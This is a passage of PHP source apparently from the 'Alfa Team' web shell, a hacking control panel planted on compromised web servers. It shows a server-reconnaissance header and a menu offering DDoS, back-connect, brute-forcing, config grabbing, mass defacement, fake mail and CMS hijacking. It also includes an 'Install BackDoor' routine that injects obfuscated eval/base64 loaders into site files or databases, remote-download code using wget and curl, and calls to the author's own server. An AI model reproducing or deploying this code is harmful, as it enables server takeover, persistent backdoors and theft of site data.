id="header_uname">\'.$uname.\'</span></td>\r\n</tr>\r\n<tr>\r\n<td><span class="header_vars">User:</span></td>\r\n<td><span class="header_values" id="header_userid">\'. $uid . \' [ \' . $user . \' ] </span><span class="header_vars"> Group: </span><span class="header_values" id="header_groupid">\' . $gid . \' [ \' . $group . \' ]</span> </td>\r\n<td width="12%" rowspan="8"><img style="border-radius:100px;" width="300" height="170" alt="alfa team 2012" draggable="false" src="http://solevisible.com/images/alfa-iran.png" /></td>\r\n</tr>\r\n<tr>\r\n<td><span class="header_vars">PHP:</span></td>\r\n<td><b>\'.@phpversion(). \' </b><span class="header_vars"> Safe Mode: \'.$safe_modes.\'</span></td>\r\n</tr>\r\n<tr>\r\n<td><span class="header_vars">ServerIP:</span></td>\r\n<td><b>\'.(!@$_SERVER["SERVER_ADDR"]?(function_exists("gethostbyname")?@gethostbyname($_SERVER[\'SERVER_NAME\']):\'????\'):@$_SERVER["SERVER_ADDR"]).\'</b><div style="display:inline;display:none;" class="flag-holder"></div> <span class="header_vars">Your IP:</span><b> \'.@$_SERVER["REMOTE_ADDR"].\'</b><div style="display:inline;display:none;" class="flag-holder"></div></td>\r\n</tr>\r\n<tr>\r\n<td width="3%"><span class="header_vars">DateTime:</span></td>\r\n<td colspan="2"><b>\'.date(\'Y-m-d H:i:s\').\'</b></td>\r\n</tr>\r\n<tr>\r\n<td><span class="header_vars">Domains:</span></td>\r\n<td width="76%"><span class="header_values" id="header_domains">\';\r\nif($GLOBALS[\'sys\']==\'unix\'){\r\n$d0mains = _alfa_file("/etc/named.conf",false);\r\nif(!$d0mains){echo "Cant Read [ /etc/named.conf ]";$GLOBALS["need_to_update_header"]="true";}else{\r\n$count=0;\r\nforeach($d0mains as $d0main){\r\nif(@strstr($d0main,"zone")){\r\npreg_match_all(\'#zone "(.*)"#\', $d0main, $domains);\r\nflush();\r\nif(strlen(trim($domains[1][0])) > 2){\r\nflush();\r\n$count++;}}}\r\necho "$count Domains";}}\r\nelse{echo("Cant Read [ /etc/named.conf ]");}\r\necho \'</span></td>\r\n</tr>\r\n<tr>\r\n<td height="16"><span class="header_vars">HDD:</span></td>\r\n<td><span class="header_vars">Total:</span><b>\'.alfaSize($totalSpace).\' </b><span class="header_vars">Free:</span><b>\' . alfaSize($freeSpace) . \' [\'. (int) ($freeSpace/$totalSpace*100) . \'%]</b></td>\r\n</tr>\';\r\nif($GLOBALS[\'sys\']==\'unix\'){\r\n$useful_downloader = \'<tr><td height="18" colspan="2"><span class="header_vars">useful:</span><span class="header_values" id="header_useful">--------------</span></td></tr><td height="0" colspan="2"><span class="header_vars">Downloader: </span><span class="header_values" id="header_downloader">--------------</span></td></tr>\';\r\nif(!@ini_get(\'safe_mode\')){\r\nif(strlen(alfaEx("id",false,false))>0){\r\necho \'<tr><td height="18" colspan="2"><span class="header_vars">Useful : </span>\';\r\n$userful = array(\'gcc\',\'lcc\',\'cc\',\'ld\',\'make\',\'php\',\'perl\',\'python\',\'ruby\',\'tar\',\'gzip\',\'bzip\',\'bzialfa2\',\'nc\',\'locate\',\'suidperl\');\r\n$x=0;\r\nforeach($userful as $item)if(alfaWhich($item)){$x++;echo \'<span class="header_values" style="margin-left: 4px;">\'.$item.\'</span>\';}\r\nif($x==0){echo "<span class=\'header_values\' id=\'header_useful\'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}\r\necho \'</td>\r\n</tr>\r\n<tr>\r\n<td height="0" colspan="2"><span class="header_vars">Downloader: </span>\';\r\n$downloaders = array(\'wget\',\'fetch\',\'lynx\',\'links\',\'curl\',\'get\',\'lwp-mirror\');\r\n$x=0;\r\nforeach($downloaders as $item2)if(alfaWhich($item2)){$x++;echo \'<span class="header_values" style="margin-left: 4px;">\'.$item2.\'</span>\';}\r\nif($x==0){echo "<span class=\'header_values\' id=\'header_downloader\'>--------------</span>";$GLOBALS["need_to_update_header"] = "true";}\r\necho \'</td>\r\n</tr>\';\r\n}else{\r\necho $useful_downloader;$GLOBALS["need_to_update_header"] = "true";\r\n}\r\n}else{\r\necho $useful_downloader;$GLOBALS["need_to_update_header"] = "true";\r\n}\r\n}else{\r\necho \'<tr><td height="18" colspan="2"><span class="header_vars">Windows:</span><b>\';\r\necho alfaEx(\'ver\',false,false);\r\necho \'</td>\r\n</tr> <tr>\r\n<td height="0" colspan="2"><span class="header_vars">Downloader: </span><b>-------------</b></td>\r\n</tr></b>\';\r\n}\r\n$quotes = (function_exists(\'get_magic_quotes_gpc\')?get_magic_quotes_gpc():\'0\');if ($quotes == "1" or $quotes == "on"){$magic = \'<b><span class="header_on">ON</span>\';}else{$magic = \'<span class="header_off">OFF</span>\';}\r\necho \'<tr>\r\n<td height="16" colspan="2"><span class="header_vars">Disable Functions: </span><b>\'.Alfa_GetDisable_Function().\'</b></td>\r\n</tr>\r\n<tr>\r\n<td height="16" colspan="2"><span class="header_vars">CURL :</span>\'.$curl.\' | <span class="header_vars">SSH2 : </span>\'.$ssh2.\' | <span class="header_vars">Magic Quotes : </span>\'.$magic.\' | <span class="header_vars"> MySQL :</span>\'.$mysql.\' | <span class="header_vars">MSSQL :</span>\'.$mssql.\' | <span class="header_vars"> PostgreSQL :</span>\'.$pg.\' | <span class="header_vars"> Oracle :</span>\'.$or.\' \'.($GLOBALS[\'sys\']=="unix"?\'| <span class="header_vars"> CGI :</span> \'.$cgi_shell:"").\'</td><td width="15%"><div id="alfa_solevisible"><center><a href="https://t.me/solevisible" target="_blank"><span><font class="solevisible-text" color="#0F0">Sole Sad & Invisible</font></span></a></center></div></td>\r\n</tr>\r\n<tr>\r\n<td height="11" colspan="3"><span class="header_vars">Open_basedir :</span><b>\'.$open_b.\'</b> | <span class="header_vars">Safe_mode_exec_dir :</span><b>\'.$safe_exe.\'</b> | <span class="header_vars"> Safe_mode_include_dir :</span></b>\'.$safe_include.\'</b></td>\r\n</tr>\r\n<tr>\r\n<td height="11"><span class="header_vars">SoftWare: </span></td>\r\n<td colspan="2"><b>\'.@getenv(\'SERVER_SOFTWARE\').\'</b></td>\r\n</tr>\';\r\nif($GLOBALS[\'sys\']=="win"){\r\necho \'<tr>\r\n<td height="12"><span class="header_vars">DRIVE:</span></td>\r\n<td colspan="2"><b>\'.$drives.\'</b></td>\r\n</tr>\';\r\n}\r\necho \'<tr>\r\n<td height="12"><span class="header_vars">PWD:</span></td>\r\n<td colspan="2"><span id="header_cwd">\'.$cwd_links.\' </span><a href="#action=fileman&path=\'.$GLOBALS[\'home_cwd\'].\'" onclick="g(\\\'FilesMan\\\',\\\'\' . $GLOBALS[\'home_cwd\'] . \'\\\',\\\'\\\',\\\'\\\',\\\'\\\')"><span class="home_shell">[ Home Shell ]</span> </a></td>\r\n</tr>\r\n</table>\r\n</div>\r\n<div id="meunlist">\r\n<ul>\r\n\';\r\n$li = array(\'proc\'=>\'Process\',\'phpeval\'=>\'Eval\',\'sql\'=>\'SQL Manager\',\'dumper\'=>\'Database Dumper\',\'coldumper\'=>\'Column Dumper\',\'hash\'=>\'En-Decoder\',\'connect\'=>\'BC\',\r\n\'zoneh\'=>\'ZONE-H\',\'dos\'=>\'DDOS\',\'safe\'=>\'ByPasser\',\'cgishell\'=>\'Cgi Shell\',\'ssiShell\'=>\'SSI SHELL\',\'cpcrack\'=>\'Hash Tools\',\r\n\'portscanner\'=>\'Port Scaner\',\'basedir\'=>\'Open BaseDir\',\'mail\'=>\'Fake Mail\',\'ziper\'=>\'Compressor\',\'deziper\'=>\'DeCompressor\',\'IndexChanger\'=>\'Index Changer\',\'pwchanger\'=>\'Add New Admin\',\'ShellInjectors\'=>\'Shell Injectors\',\r\n\'php2xml\'=>\'PHP2XML\',\'cloudflare\'=>\'CloudFlare\',\'Whmcs\'=>\'Whmcs DeCoder\',\'symlink\'=>\'Symlink\',\'MassDefacer\'=>\'Mass Defacer\',\'Crackers\'=>\'BruteForcer\',\'searcher\'=>\'Searcher\',\'config_grabber\'=>\'Config Grabber\',\'fakepage\'=>\'Fake Page\',\'archive_manager\'=>\'Archive Manager\',\r\n\'cmshijacker\'=>\'CMS Hijacker\',\'remotedl\'=>\'Remote Upload\',\'inbackdoor\'=>\'Install BackDoor\',\'whois\'=>\'Whois\',\'selfrm\'=>\'Remove Shell\'\r\n);\r\nforeach($li as $key=>$value){\r\necho(\'<li><a id="menu_opt_\'.$key.\'" href="#action=options&path=\'.$GLOBALS[\'cwd\'].\'&opt=\'.$key.\'" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\\\'#action=options&path=\\\'+c_+\\\'&opt=\'.$key.\'\\\';g(\\\'\'.$key.\'\\\',null,\\\'\\\',\\\'\\\',\\\'\\\');d.querySelector(\\\'.opt-title\\\').innerHTML=this.innerHTML;">\'.$value.\'</a></li>\'."\\n");\r\n}\r\necho \'</ul><div style="text-align: center;padding: 6px;"><a id="menu_opt_settings" href="#action=options&path=\'.$GLOBALS[\'cwd\'].\'&opt=settings" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\\\'#action=options&path=\\\'+c_+\\\'&opt=settings\\\';g(\\\'settings\\\',null,\\\'\\\',\\\'\\\',\\\'\\\');d.querySelector(\\\'.opt-title\\\').innerHTML=this.innerHTML;">Alfa Settings</a><a style="display:none;" id="menu_opt_market" href="#action=options&path=\'.$GLOBALS[\'cwd\'].\'&opt=market" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\\\'#action=options&path=\\\'+c_+\\\'&opt=market\\\';g(\\\'market\\\',null,\\\'\\\',\\\'\\\',\\\'\\\');d.querySelector(\\\'.opt-title\\\').innerHTML=this.innerHTML;"><span class="alfa_plus">Alfa market</span></a><a id="menu_opt_aboutus" href="#action=options&path=\'.$GLOBALS[\'cwd\'].\'&opt=aboutus" class="menu_options" onclick="alfa_can_add_opt=true;this.href=\\\'#action=options&path=\\\'+c_+\\\'&opt=aboutus\\\';g(\\\'aboutus\\\',null,\\\'\\\',\\\'\\\',\\\'\\\');d.querySelector(\\\'.opt-title\\\').innerHTML=this.innerHTML;">About Us</a>\'.(!empty($_COOKIE[\'AlfaUser\']) && !empty($_COOKIE[\'AlfaPass\']) ? \'<a href="javascript:void(0);" onclick="alfaLogOut();"><font color="red">LogOut</font></a>\':\'\').\'</div></div><div id="filesman_tabs"><div onmouseover="alfaFilesmanTabShowTitle(this,event);" onmouseout="alfaFilesmanTabHideTitle(this,event);" fm_counter="1" path="\'.$GLOBALS[\'cwd\'].\'" fm_id="1" id="filesman_tab_1" class="filesman_tab filesman-tab-active" onclick="filesmanTabController(this);"><img class="folder-tab-icon" src="http://solevisible.com/icons/menu/folder2.svg"> <span>File manager</span></div><div style="display:inline-block;" id="filesman_tabs_child"></div><div id="filesman_new_tab" class="filesman_tab" style="background: maroon;" onClick="alfaFilesManNewTab(c_,\\\'/\\\',1);">New Tab +</div></div>\';}else{\r\n@error_reporting(E_ALL ^ E_NOTICE);\r\n@ini_set(\'error_log\',NULL);\r\n@ini_set(\'log_errors\',0);\r\n@ini_set(\'max_execution_time\',0);\r\n@ini_set(\'magic_quotes_runtime\', 0);\r\n@set_time_limit(0);\r\n}}\r\nfunction alfalogout(){\r\n@setcookie("AlfaUser", null, 2012);\r\n@setcookie("AlfaPass", null, 2012);\r\nunset($_COOKIE[\'AlfaUser\'],$_COOKIE[\'AlfaPass\']);\r\necho("ok");\r\n}\r\nfunction showAnimation($name){\r\n\treturn \'-webkit-animation: \'.$name.\' 800ms ease-in-out forwards;-moz-animation: \'.$name.\' 800ms ease-in-out forwards;-ms-animation: \'.$name.\' 800ms ease-in-out forwards;animation: \'.$name.\' 800ms ease-in-out forwards;\';\r\n}\r\nfunction __showicon($r){\r\n\t$s[\'btn\']=\'http://solevisible.com/images/btn.png\';\r\n\t$s[\'alfamini\']=\'http://solevisible.com/images/alfamini.png\';\r\n\t$s[\'loader\']=\'http://solevisible.com/images/loader.svg\';\r\n\t//return \'data:image/png;base64,\'.__get_resource($s[$r]);\r\n\treturn $s[$r];\r\n}\r\nfunction alfainbackdoor(){\r\nalfahead();\r\necho \'<div class=header><center><p><div class="txtfont_header">| Install BackDoor |</div></p><h3><a href=javascript:void(0) onclick="g(\\\'inbackdoor\\\',null,\\\'file\\\')">| In File | </a><a href=javascript:void(0) onclick="g(\\\'inbackdoor\\\',null,\\\'db\\\')">| In DataBase | </a></h3></center>\';\r\n$error = \'<font color="red">Error In Inject BackDoor...!<br>File Loader is not Writable Or Not Exists...!</font>\';\r\n$success= \'<font color="green">Success...!\';\r\n$textarea = "<div style=\'display:none;\' id=\'backdoor_textarea\'><div class=\'txtfont\'>Your Shell:</div><p><textarea name=\'shell\' rows=\'19\' cols=\'103\'><?php\\n\\techo(\'Alfa Team is Here...!\');\\n?></textarea></p></div>";\r\n$select = "<div class=\'txtfont\'>Use:</div> <select name=\'method\' style=\'width:155px;\' onChange=\'inBackdoor(this);\'><option value=\'alfa\'>Alfa Team Uploader</option><option value=\'my\'>My Private Shell</option></select>";\r\n$cwd = \'Example: /home/alfa/public_html/index.php\';\r\nif($_POST[\'alfa1\']==\'file\'){\r\necho("<center><p><div class=\'txtfont_header\'>| In File |</div></p><p><form onsubmit=\\"g(\'inbackdoor\',null,\'file\',this.method.value,this.file.value,this.shell.value,this.key.value);return false;\\">{$select} <div class=\'txtfont\'>Backdoor Loader:</div> <input type=\'text\' name=\'file\' size=\'50\' placeholder=\'{$cwd}\'> <div class=\'txtfont\'>Key: </div> <input type=\'text\' name=\'key\' size=\'10\' value=\'alfa\'> <input type=\'submit\' value=\' \'>{$textarea}</form></p></center>");\r\nif($_POST[\'alfa2\']!=\'\'&&$_POST[\'alfa3\']!=\'\'&&$_POST[\'alfa4\']!=\'\'){\r\n$method = $_POST[\'alfa2\'];\r\n$file = $_POST[\'alfa3\'];\r\n$shell = $_POST[\'alfa4\'];\r\n$key = str_replace(array(\'"\',\'\\\'\'),\'\',trim($_POST[\'alfa5\']));\r\nif($key==\'\')$key=\'alfa\';\r\nif($method==\'my\'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS[\'__ALFA_SHELL_CODE\'];}\r\n$code = \'<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="\'.$key.\'"){$func="cr"."ea"."te_"."fun"."ction";$x=$func("\\$c","e"."v"."al"."(\\\'?>\\\'.base"."64"."_dec"."ode(\\$c));");$x("\'.$shell.\'");exit;}?>\';\r\nif(@is_file($file)&&@is_writable($file)){@file_put_contents($file,$code."\\n".@file_get_contents($file));__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.\'</font>\');}else{__alert($error);}}}\r\nif($_POST[\'alfa1\']==\'db\'){\r\necho("<center><p><div class=\'txtfont_header\'>| In DataBase |</div></p>".getConfigHtml(\'all\')."<p><form onsubmit=\\"g(\'inbackdoor\',null,\'db\',this.db_host.value,this.db_username.value,this.db_password.value,this.db_name.value,this.file.value,this.method.value,this.shell.value,this.key.value);return false;\\">");\r\n$table = array(\'td1\' =>\r\narray(\'color\' => \'FFFFFF\', \'tdName\' => \'db_host : \', \'inputName\' => \'db_host\', \'id\' => \'db_host\', \'inputValue\' => \'localhost\', \'inputSize\' => \'50\'),\r\n\'td2\' =>\r\narray(\'color\' => \'FFFFFF\', \'tdName\' => \'db_username : \', \'inputName\' => \'db_username\', \'id\' => \'db_user\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n\'td3\' =>\r\narray(\'color\' => \'FFFFFF\', \'tdName\' => \'db_password : \', \'inputName\' => \'db_password\', \'id\' => \'db_pw\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n\'td4\' =>\r\narray(\'color\' => \'FFFFFF\', \'tdName\' => \'db_name : \', \'inputName\' => \'db_name\', \'id\' => \'db_name\', \'inputValue\' => \'\', \'inputSize\' => \'50\'),\r\n\'td5\' =>\r\narray(\'color\' => \'FFFFFF\', \'tdName\' => \'Backdoor Loader: \', \'inputName\' => \'file\', \'inputValue\' => $cwd, \'inputSize\' => \'50\', \'placeholder\' => true),\r\n\'td6\' =>\r\narray(\'color\' => \'FFFFFF\', \'tdName\' => \'Key: \', \'inputName\' => \'key\', \'inputValue\' => \'alfa\', \'inputSize\' => \'50\')\r\n);\r\ncreate_table($table);\r\necho("<p>{$select}</p>");\r\necho($textarea);\r\necho("<p><input type=\'submit\' value=\' \'></p></form></p></center>");\r\nif($_POST[\'alfa2\']!=\'\'&&$_POST[\'alfa3\']!=\'\'&&$_POST[\'alfa5\']!=\'\'&&$_POST[\'alfa6\']!=\'\'){\r\n$dbhost = $_POST[\'alfa2\'];\r\n$dbuser = $_POST[\'alfa3\'];\r\n$dbpw = $_POST[\'alfa4\'];\r\n$dbname = $_POST[\'alfa5\'];\r\n$file = $_POST[\'alfa6\'];\r\n$method = $_POST[\'alfa7\'];\r\n$shell = $_POST[\'alfa8\'];\r\n$key = str_replace(array(\'"\',\'\\\'\'),\'\',trim($_POST[\'alfa9\']));\r\nif($key==\'\')$key=\'alfa\';\r\nif($method==\'my\'){$shell=__ZW5jb2Rlcg($shell);}else{$shell=$GLOBALS[\'__ALFA_SHELL_CODE\'];}\r\nif($conn = mysqli_connect($dbhost,$dbuser,$dbpw,$dbname)){\r\n$code = \'<?php if(isset($_GET["alfa"])&&$_GET["alfa"]=="\'.$key.\'"){$conn=mysqli_connect("\'.str_replace(\'"\',\'\\"\',$dbhost).\'","\'.str_replace(\'"\',\'\\"\',$dbuser).\'","\'.str_replace(\'"\',\'\\"\',$dbpw).\'","\'.str_replace(\'"\',\'\\"\',$dbname).\'");$q=mysqli_query($conn,"SELECT `code` FROM alfa_bc LIMIT 0,1");$r=mysqli_fetch_assoc($q);$func="cr"."ea"."te_"."fun"."ction";$x=$func("\\$c","e"."v"."al"."(\\\'?>\\\'.base"."64"."_dec"."ode(\\$c));");$x($r["code"]);exit;}?>\';\r\nif(@is_file($file)&&@is_writable($file)){\r\n@mysqli_query($conn,\'DROP TABLE `alfa_bc`\');\r\n@mysqli_query($conn,\'CREATE TABLE `alfa_bc` (code LONGTEXT)\');\r\n@mysqli_query($conn,\'INSERT INTO `alfa_bc` VALUES("\'.$shell.\'")\');\r\n@file_put_contents($file,$code."\\n".@file_get_contents($file));\r\n__alert($success."<br>Run With: ".basename($file)."?alfa=".$key.\'</font>\');}else{__alert($error);}}}}\r\necho(\'</div>\');\r\nalfafooter();\r\n}\r\nfunction alfawhois(){\r\necho("<div class=\'header\'><center><p><div class=\'txtfont_header\'>| Whois |</div></p><p><form onsubmit=\\"g(\'whois\',null,this.url.value,\'>>\');return false;\\"><div class=\'txtfont\'>Url: </div> <input type=\'text\' name=\'url\' style=\'text-align:center;\' size=\'50\' placeholder=\'google.com\'> <input type=\'submit\' value=\' \'></form></p></center>");\r\nif($_POST[\'alfa2\']==\'>>\'&&!empty($_POST[\'alfa1\'])){\r\n$site = str_replace(array(\'http://\',\'https://\',\'www.\',\'ftp://\'),\'\',$_POST[\'alfa1\']);\r\n$target = \'http://api.whoapi.com/?apikey=093b6cb9e6ea724e101928647df3e009&r=whois&domain=\'.$site;\r\n$data = @file_get_contents($target);\r\nif($data==\'\'){$get = new AlfaCURL();$get->ssl = true;$data = $get->Send($target);}\r\n$target = @json_decode($data,true);\r\necho __pre();\r\nif(is_array($target)){echo($target["whois_raw"]);}else{echo alfaEx("whois ".$site);}}\r\necho("</div>");\r\n}\r\nfunction alfaremotedl(){\r\nalfahead();\r\necho("<div class=\'header\'><center><p><div class=\'txtfont_header\'>| Upload From Url |</div></p><p>\r\n<form onsubmit=\\"g(\'remotedl\',null,this.d.value,this.p.value,\'>>\');return false;\\">\r\n<p><div class=\'txtfont\'>Url: </div>&nbsp;&nbsp;&nbsp;<input type=\'text\' name=\'d\' size=\'50\'></p>\r\n<div class=\'txtfont\'>Path:</div> <input type=\'text\' name=\'p\' size=\'50\' value=\'".$GLOBALS[\'cwd\']."\'><p><input type=\'submit\' value=\' \'></p>\r\n</form></p></center>");\r\nif(isset($_POST[\'alfa1\'],$_POST[\'alfa2\'],$_POST[\'alfa3\'])&&!empty($_POST[\'alfa1\'])&&$_POST[\'alfa3\']==\'>>\'){\r\necho __pre();\r\n$url = $_POST[\'alfa1\'];\r\n$path = $_POST[\'alfa2\'];\r\necho(\'<center>\');\r\nif(__download($url,$path)){\r\necho(\'<font color="green">Success...!</font>\');\r\n}else{\r\necho(\'<font color="red">Error...!</font>\');\r\n}\r\necho(\'</center>\');\r\n}\r\necho("</div>");\r\nalfafooter();\r\n}\r\nfunction __download($url,$path=false){\r\nif(!preg_match("/[a-z]+:\\/\\/.+/",$url)) return false;\r\n$saveas = basename(rawurldecode($url));\r\nif($path){$saveas=$path.$saveas;}\r\nif($content = __read_file($url)){\r\nif(@is_file($saveas))@unlink($saveas);\r\nif(__write_file($saveas, $content)){return true;}}\r\n$buff = alfaEx("wget ".$url." -O ".$saveas);\r\nif(@is_file($saveas)) return true;\r\n$buff = alfaEx("curl ".$url." -o ".$saveas);\r\nif(@is_file($saveas)) return true;\r\n$buff = alfaEx("lwp-download ".$url." ".$saveas);\r\nif(@is_file($saveas)) return true;\r\n$buff = alfaEx("lynx -source ".$url." > ".$saveas);\r\nif(@is_file($saveas)) return true;\r\n$buff = alfaEx("GET ".$url." > ".$saveas);\r\nif(@is_file($saveas)) return true;\r\n$buff = alfaEx("links -source ".$url." > ".$saveas);\r\nif(@is_file($saveas)) return true;\r\n$buff = alfaEx("fetch -o ".$saveas." -p ".$url);\r\nif(@is_file($saveas)) return true;\r\nreturn false;\r\n}\r\nfunction clean_string($string){\r\n  if(function_exists("iconv")){\r\n\t  $s = trim($string);\r\n\t  $s = iconv("UTF-8", "UTF-8//IGNORE", $s);\r\n  }\r\n  return $s;\r\n}\r\nfunction __read_file($file, $boom = true){\r\n$content = false;\r\nif($fh = @fopen($file, "rb")){\r\n$content = "";\r\nwhile(!feof($fh)){\r\n$content .= $boom ? clean_string(fread($fh, 8192)) : fread($fh, 8192);\r\n}\r\n@fclose($fh);\r\n}\r\nif(empty($content)||!$content){\r\n\t$content = alfaEx("cat \'".addslashes($file)."\'");\r\n}\r\nreturn $content;\r\n}\r\nfunction alfaMarket(){\r\necho "<div class=\'header\'>";\r\n$curl = new AlfaCURL();\r\n$content = $curl->Send("http://solevisible.com/market.php");\r\n$data = @json_decode($content, true);\r\nif(!empty($data)){\r\nif($data["status"] == "open"){\r\n\techo $data["content"];\r\n}else{\r\n\techo $data["error_msg"];\r\n}\r\n}else{\r\n\techo "<div style=\'text-align:center;font-size:20px;\'>Cant connect to the alfa market....! try later.</div>";\r\n}\r\necho "</div>";\r\n}\r\nfunction alfaSettings(){\r\nalfahead();\r\nAlfaNum(6,7,8,9,10);\r\necho \'<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g(\\\'settings\\\',null,null,null,null,null,null,null,null,\\\'main\\\')">| Generall Setting | </a></h3></center>\';\r\nif($_POST["alfa8"] == "main"){\r\necho \'<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method=\\\'post\\\'>\';\r\n$lg_array = array(\'0\'=>\'No\',\'1\'=>\'Yes\');\r\n$penc_array = array(\'false\'=>\'No\',\'true\'=>\'Yes\');\r\n$protect_html = "";\r\n$icon_html = "";\r\n$postEnc_html = "";\r\n$login_html = "";\r\n$cgiapi_html = "";\r\nforeach($lg_array as $key=>$val)$protect_html .= \'<option value="\'.$key.\'" \'.($GLOBALS[\'DB_NAME\'][\'safemode\']==\'1\'?\'selected\':\'\').\'>\'.$val.\'</option>\';\r\nforeach($lg_array as $key=>$val)$icon_html .= \'<option value="\'.$key.\'" \'.($GLOBALS[\'DB_NAME\'][\'show_icons\']==\'1\'?\'selected\':\'\').\'>\'.$val.\'</option>\';\r\nforeach($penc_array as $key=>$val)$cgiapi_html .= \'<option value="\'.$key.\'" \'.(!empty($_POST[\'alfa9\'])&&$_POST[\'alfa9\']==$key?"selected":($GLOBALS["DB_NAME"]["cgi_api"]&&empty($_POST[\'alfa9\'])?\'selected\':\'\')).\'>\'.$val.\'</option>\';\r\nforeach($penc_array as $key=>$val)$postEnc_html .= \'<option value="\'.$key.\'" \'.(!empty($_POST[\'alfa7\'])&&$_POST[\'alfa7\']==$key?"selected":(__ALFA_POST_ENCRYPTION__&&empty($_POST[\'alfa7\'])?\'selected\':\'\')).\'>\'.$val.\'</option>\';\r\n$lg_array = array("gui"=>"GUI","500"=>"500 Internal Server Error","403"=>"403 Forbidden","404"=>"404 NotFound");\r\nforeach($lg_array as $key=>$val)$login_html .= \'<option value="\'.$key.\'" \'.($GLOBALS[\'DB_NAME\'][\'login_page\']==$key?\'selected\':\'\').\'>\'.$val.\'</option>\';\r\necho \'\';\r\necho \'<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">\'.$protect_html.\'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Cgi Api:</div></td><td><select name="cgi_api" style="width:100%;">\'.$cgiapi_html.\'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">\'.$postEnc_html.\'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">\'.$icon_html.\'</select></td></tr><tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">\'.$login_html.\'</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="\'.(empty($_POST[\'alfa3\'])?$GLOBALS[\'DB_NAME\'][\'user\']:$_POST[\'alfa3\']).\'" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="\'.$GLOBALS[\'DB_NAME\'][\'safemode\'].\'"><input type="hidden" name="s" value="\'.$GLOBALS[\'DB_NAME\'][\'show_icons\'].\'"><p><input type="submit" name="btn" value=" "></p></form></center>\';\r\nif($_POST[\'alfa5\']==\'>>\'){\r\necho __pre();\r\nif(!empty($_POST[\'alfa3\'])){\r\n$protect = $_POST[\'alfa1\'];\r\n$lgpage = $_POST[\'alfa2\'];\r\n$username = $_POST[\'alfa3\'];\r\n$password = md5($_POST[\'alfa4\']);\r\n$icon = $_POST[\'alfa6\'];\r\n$post_encrypt = $_POST[\'alfa7\'];\r\n$cgi_api_val = $_POST[\'alfa9\'];\r\n@chdir($GLOBALS[\'home_cwd\']);\r\n$basename = @basename($_SERVER[\'PHP_SELF\']);\r\n$data = @file_get_contents($basename);\r\n$user_rand = $GLOBALS["DB_NAME"]["user_rand"];\r\n$pass_rand = $GLOBALS["DB_NAME"]["pass_rand"];\r\n$login_page_rand = $GLOBALS["DB_NAME"]["login_page_rand"];\r\n$safemode_rand = $GLOBALS["DB_NAME"]["safemode_rand"];\r\n$show_icons_rand = $GLOBALS["DB_NAME"]["show_icons_rand"];\r\n$post_encryption_rand = $GLOBALS["DB_NAME"]["post_encryption_rand"];\r\n$cgi_api_rand = $GLOBALS["DB_NAME"]["cgi_api_rand"];\r\n$find_user = \'/\\\'\'.$user_rand.\'\\\'(.*?),/i\';\r\n$find_pw = \'/\\\'\'.$pass_rand.\'\\\'(.*?),/i\';\r\n$find_lg = \'/\\\'\'.$login_page_rand.\'\\\'(.*?),/i\';\r\n$find_p = \'/\\\'\'.$safemode_rand.\'\\\'(.*?),/i\';\r\n$icons = \'/\\\'\'.$show_icons_rand.\'\\\'(.*?),/i\';\r\n$postEnc = \'/\\\'\'.$post_encryption_rand.\'\\\'(.*?),/i\';\r\n$cgi_api_reg = \'/\\\'\'.$cgi_api_rand.\'\\\'(.*?),/i\';\r\nif(!empty($username)&&preg_match($find_user,$data,$e)){\r\n$new = \'\\\'\'.$user_rand.\'\\\' => \\\'\'.$username.\'\\\',\';\r\n$data = str_replace($e[0],$new,$data);\r\n}\r\nif(!empty($_POST[\'alfa4\'])&&preg_match($find_pw,$data,$e)){\r\n$new = \'\\\'\'.$pass_rand.\'\\\' => \\\'\'.$password.\'\\\',\';\r\n$data = str_replace($e[0],$new,$data);\r\n}\r\nif(!empty($lgpage)&&preg_match($find_lg,$data,$e)){\r\n$new = \'\\\'\'.$login_page_rand.\'\\\' => \\\'\'.$lgpage.\'\\\',\';\r\n$data = str_replace($e[0],$new,$data);\r\n}\r\nif(!empty($find_p)&&preg_match($find_p,$data,$e)){\r\n$new = \'\\\'\'.$safemode_rand.\'\\\' => \\\'\'.$protect.\'\\\',\';\r\n$data = str_replace($e[0],$new,$data);\r\n}\r\nif(preg_match($icons,$data,$e)){\r\n$new = \'\\\'\'.$show_icons_rand.\'\\\' => \\\'\'.$icon.\'\\\',\';\r\n$data = str_replace($e[0],$new,$data);\r\n}\r\nif(preg_match($postEnc,$data,$e)){\r\n$new = \'\\\'\'.$post_encryption_rand.\'\\\' => \'.$post_encrypt.\',\';\r\n$data = str_replace($e[0],$new,$data);\r\n}\r\nif(preg_match($cgi_api_reg,$data,$e)){\r\n$new = \'\\\'\'.$cgi_api_rand.\'\\\' => \'.$cgi_api_val.\',\';\r\n$data = str_replace($e[0],$new,$data);\r\n}\r\nif(@file_put_contents($basename,$data)){\r\necho \'<b>UserName: </b><font color="green"><b>\'.$username.\'</b></font><br /><b>Password: </b><font color="green"><b>\'.$_POST[\'alfa4\'].\'</b></font><script>post_encryption_mode = \'.$post_encrypt.\';</script>\';\r\n}else{\r\n__alert("<span style=\'color:red;\'>File has no edit access...!</span>");\r\n}\r\n}else{\r\n__alert("<span style=\'color:red;\'>UserName is Empty 